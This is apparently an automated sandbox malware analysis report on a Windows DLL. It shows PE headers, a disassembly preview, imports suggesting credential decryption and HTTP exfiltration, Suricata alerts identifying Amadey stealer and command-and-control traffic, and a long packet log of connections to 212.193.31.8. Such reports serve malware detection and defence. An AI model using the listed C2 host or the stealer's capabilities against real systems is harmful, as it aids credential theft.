                                                                      Time Stamp:0x676432F7 [Thu Dec 19 14:51:35 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:3f175edea93fa7a76a78004d12de2235

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      dec eax
                                                                      mov dword ptr [esp+08h], ebx
                                                                      dec eax
                                                                      mov dword ptr [esp+10h], esi
                                                                      push edi
                                                                      dec eax
                                                                      sub esp, 20h
                                                                      dec ecx
                                                                      mov edi, eax
                                                                      mov ebx, edx
                                                                      dec eax
                                                                      mov esi, ecx
                                                                      cmp edx, 01h
                                                                      jne 00007F0859044C47h
                                                                      call 00007F0859044FA8h
                                                                      dec esp
                                                                      mov eax, edi
                                                                      mov edx, ebx
                                                                      dec eax
                                                                      mov ecx, esi
                                                                      dec eax
                                                                      mov ebx, dword ptr [esp+30h]
                                                                      dec eax
                                                                      mov esi, dword ptr [esp+38h]
                                                                      dec eax
                                                                      add esp, 20h
                                                                      pop edi
                                                                      jmp 00007F0859044AD4h
                                                                      int3
                                                                      int3
                                                                      int3
                                                                      dec eax
                                                                      and dword ptr [ecx+10h], 00000000h
                                                                      dec eax
                                                                      lea eax, dword ptr [0002F048h]
                                                                      dec eax
                                                                      mov dword ptr [ecx+08h], eax
                                                                      dec eax
                                                                      lea eax, dword ptr [0002F02Dh]
                                                                      dec eax
                                                                      mov dword ptr [ecx], eax
                                                                      dec eax
                                                                      mov eax, ecx
                                                                      ret
                                                                      int3
                                                                      int3
                                                                      dec eax
                                                                      sub esp, 48h
                                                                      dec eax
                                                                      lea ecx, dword ptr [esp+20h]
                                                                      call 00007F0859044C17h
                                                                      dec eax
                                                                      lea edx, dword ptr [00057E87h]
                                                                      dec eax
                                                                      lea ecx, dword ptr [esp+20h]
                                                                      call 00007F0859047156h
                                                                      int3
                                                                      dec eax
                                                                      mov dword ptr [esp+10h], ebx
                                                                      dec eax
                                                                      mov dword ptr [esp+18h], esi
                                                                      push edi
                                                                      dec eax
                                                                      sub esp, 10h
                                                                      xor eax, eax
                                                                      xor ecx, ecx
                                                                      cpuid
                                                                      inc esp
                                                                      mov eax, ecx
                                                                      inc ebp
                                                                      xor ebx, ebx
                                                                      inc esp
                                                                      mov ecx, ebx
                                                                      inc ecx
                                                                      xor eax, 6C65746Eh
                                                                      inc ecx
                                                                      xor ecx, 756E6547h
                                                                      inc esp
                                                                      mov edx, edx
                                                                      mov esi, eax
                                                                      xor ecx, ecx
                                                                      inc ecx
                                                                      lea eax, dword ptr [ebx+01h]
                                                                      inc ebp
                                                                      or ecx, eax
                                                                      cpuid
                                                                      inc ecx
                                                                      xor edx, 49656E69h
                                                                      mov dword ptr [esp], eax
                                                                      inc ebp

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x127e000x58.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x127e580x8c.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1420000xf8.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1360000xae9c.pdata
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1430000x126c.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x1194c00x70.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1195300x138.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xfe0000x600.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000xfc7d00xfc800974673a51250f4e87dcc26eaa48952f6False0.5002552599009901data6.448659753395251IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0xfe0000x2b31e0x2b400fbb88beaa32195b981c2a59a1af2bc97False0.4419255780346821data5.689346666675183IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x12a0000xbb8c0x440061d31a77fefa0f32c01e3f3bc17f6803False0.1189108455882353DOS executable (block device driver \322f\324\377\3772)2.1677539241948747IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .pdata0x1360000xae9c0xb000e4078c360762dca3d61be203aa183883False0.4589621803977273data6.057856540511637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      _RDATA0x1410000xfc0x200e6b0804fe5391dcc441dbda6a53f9f66False0.326171875data2.4656798618339506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .rsrc0x1420000xf80x200193fc41b7ab2ce83170d116dba1ce3acFalse0.3359375data2.5236806502270213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x1430000x126c0x1400899e8e612e41b578dba238a8e36a5e4bFalse0.425390625data5.2926472964845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_MANIFEST0x1420600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793

                                                                      Imports

                                                                      DLLImport
                                                                      CRYPT32.dllCryptUnprotectData
                                                                      KERNEL32.dllGetFullPathNameA, SetEndOfFile, UnlockFileEx, GetTempPathW, CreateMutexW, WaitForSingleObject, CreateFileW, GetFileAttributesW, GetCurrentThreadId, UnmapViewOfFile, HeapValidate, HeapSize, MultiByteToWideChar, Sleep, GetTempPathA, FormatMessageW, GetDiskFreeSpaceA, GetLastError, GetFileAttributesA, GetFileAttributesExW, OutputDebugStringW, CreateFileA, LoadLibraryA, WaitForSingleObjectEx, DeleteFileA, DeleteFileW, HeapReAlloc, CloseHandle, GetSystemInfo, LoadLibraryW, HeapAlloc, HeapCompact, HeapDestroy, UnlockFile, GetProcAddress, CreateFileMappingA, LocalFree, LockFileEx, GetFileSize, DeleteCriticalSection, GetCurrentProcessId, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, WideCharToMultiByte, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, CreateFileMappingW, MapViewOfFile, QueryPerformanceCounter, GetTickCount, FlushFileBuffers, SetHandleInformation, FindFirstFileA, Wow64DisableWow64FsRedirection, K32GetModuleFileNameExW, FindNextFileA, CreatePipe, PeekNamedPipe, lstrlenA, FindClose, GetCurrentDirectoryA, lstrcatA, OpenProcess, SetCurrentDirectoryA, CreateToolhelp32Snapshot, ProcessIdToSessionId, CopyFileA, Wow64RevertWow64FsRedirection, Process32NextW, Process32FirstW, CreateThread, CreateProcessA, CreateDirectoryA, WriteConsoleW, InitializeCriticalSection, LeaveCriticalSection, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, GetFullPathNameW, EnterCriticalSection, HeapFree, HeapCreate, TryEnterCriticalSection, ReadFile, AreFileApisANSI, SetFilePointer, ReadConsoleW, SetFilePointerEx, GetFileSizeEx, GetConsoleMode, GetConsoleOutputCP, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, SetStdHandle, GetCurrentDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InitializeSListHead, LCMapStringEx, InitializeCriticalSectionEx, EncodePointer, DecodePointer, CompareStringEx, GetCPInfo, GetStringTypeW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, InterlockedFlushSList, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ExitProcess, GetModuleFileNameW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetStdHandle
                                                                      ADVAPI32.dllRegQueryValueExA, RegEnumValueW, RegEnumKeyA, RegCloseKey, RegQueryInfoKeyW, RegOpenKeyA, RegOpenKeyExA, GetSidSubAuthorityCount, GetSidSubAuthority, GetUserNameA, RegEnumKeyExW, LookupAccountNameA, GetSidIdentifierAuthority
                                                                      SHELL32.dllSHGetFolderPathA, SHFileOperationA
                                                                      WININET.dllHttpOpenRequestA, InternetWriteFile, InternetReadFile, InternetConnectA, HttpSendRequestA, InternetCloseHandle, InternetOpenA, HttpAddRequestHeadersA, HttpSendRequestExW, HttpEndRequestA, InternetOpenW
                                                                      bcrypt.dllBCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptGenerateSymmetricKey, BCryptDecrypt

                                                                      Exports

                                                                      NameOrdinalAddress
                                                                      Main10x1800bfaf0
                                                                      Save20x1800056a0

                                                                      Possible Origin

                                                                      Language of compilation systemCountry where language is spokenMap
                                                                      EnglishUnited States

                                                                      Network Behavior

                                                                      Suricata IDS Alerts

                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-12-23T06:38:24.614773+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.449730212.193.31.880TCP
                                                                      2024-12-23T06:38:24.614773+01002856150ETPRO MALWARE Amadey CnC Activity M61192.168.2.449730212.193.31.880TCP
                                                                      2024-12-23T06:38:24.630041+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.449731212.193.31.880TCP
                                                                      2024-12-23T06:38:24.630041+01002856150ETPRO MALWARE Amadey CnC Activity M61192.168.2.449731212.193.31.880TCP
                                                                      2024-12-23T06:38:30.770706+01002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.449732212.193.31.880TCP
                                                                      2024-12-23T06:38:30.770706+01002856150ETPRO MALWARE Amadey CnC Activity M61192.168.2.449732212.193.31.880TCP

                                                                      Network Port Distribution

                                                                      TCP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 23, 2024 06:38:02.599890947 CET4973080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:02.611874104 CET4973180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:02.719870090 CET8049730212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:02.722656012 CET4973080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:02.722656012 CET4973080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:02.731909990 CET8049731212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:02.734698057 CET4973180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:02.734761953 CET4973180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:02.843535900 CET8049730212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:02.854487896 CET8049731212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:08.752999067 CET4973280192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:08.872731924 CET8049732212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:08.872832060 CET4973280192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:08.873013973 CET4973280192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:08.992484093 CET8049732212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:24.614696026 CET8049730212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:24.614773035 CET4973080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:24.614928007 CET4973080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:24.629981995 CET8049731212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:24.630040884 CET4973180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:24.630423069 CET4973180192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:24.734509945 CET8049730212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:24.750700951 CET8049731212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:30.770632029 CET8049732212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:30.770705938 CET4973280192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:30.770821095 CET4973280192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:30.890456915 CET8049732212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:39.608069897 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.608978033 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.728023052 CET8049739212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:39.728115082 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.728630066 CET8049740212.193.31.8192.168.2.4
                                                                      Dec 23, 2024 06:38:39.728694916 CET4974080192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.731342077 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.731420994 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.731570005 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.731602907 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.731631994 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.731709003 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.731738091 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.731765032 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.731791019 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.731897116 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.731924057 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.731951952 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.731977940 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732014894 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732408047 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732455969 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732485056 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732511997 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732539892 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732568026 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732594013 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732620001 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732650042 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732676029 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732702017 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732728004 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732758045 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732892990 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732924938 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.732953072 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733078957 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733104944 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733206987 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733237028 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733261108 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733288050 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733365059 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733395100 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733422995 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733448982 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733474970 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733505011 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733731985 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733764887 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733795881 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733823061 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733859062 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733881950 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733908892 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733932018 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733963966 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.733989954 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734018087 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734050035 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734164953 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734196901 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734226942 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734256029 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734287977 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734370947 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734396935 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734426975 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734524965 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734550953 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734575987 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734656096 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734683037 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734710932 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734739065 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734770060 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734802008 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734829903 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.734859943 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735059977 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735088110 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735147953 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735187054 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735239983 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735277891 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735320091 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735346079 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735371113 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735397100 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735430002 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735718966 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735785007 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735785007 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735830069 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735852957 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735877037 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735903025 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735924959 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.735950947 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736129045 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736162901 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736190081 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736217976 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736293077 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736323118 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736351967 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736453056 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736484051 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736512899 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736541986 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736572027 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736793995 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736828089 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736856937 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736891031 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736917973 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736944914 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.736973047 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737000942 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737027884 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737056017 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737088919 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737117052 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737148046 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737174988 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737200975 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737234116 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737258911 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737409115 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737437010 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737468004 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737495899 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737523079 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737550020 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737657070 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737684965 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737762928 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737790108 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737823009 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737910032 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737938881 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737965107 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.737993956 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738020897 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738214016 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738239050 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738276005 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738293886 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738320112 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738347054 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738377094 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738401890 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738429070 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738456011 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738486052 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738512039 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738543034 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738567114 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738593102 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738713026 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738742113 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738770962 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738878965 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738910913 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.738984108 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739012003 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739041090 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739069939 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739145041 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739170074 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739203930 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739229918 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739260912 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739285946 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739492893 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739520073 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739548922 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739574909 CET4973980192.168.2.4212.193.31.8
                                                                      Dec 23, 2024 06:38:39.739605904 CET4973980192.168.2.4212.193.31.8
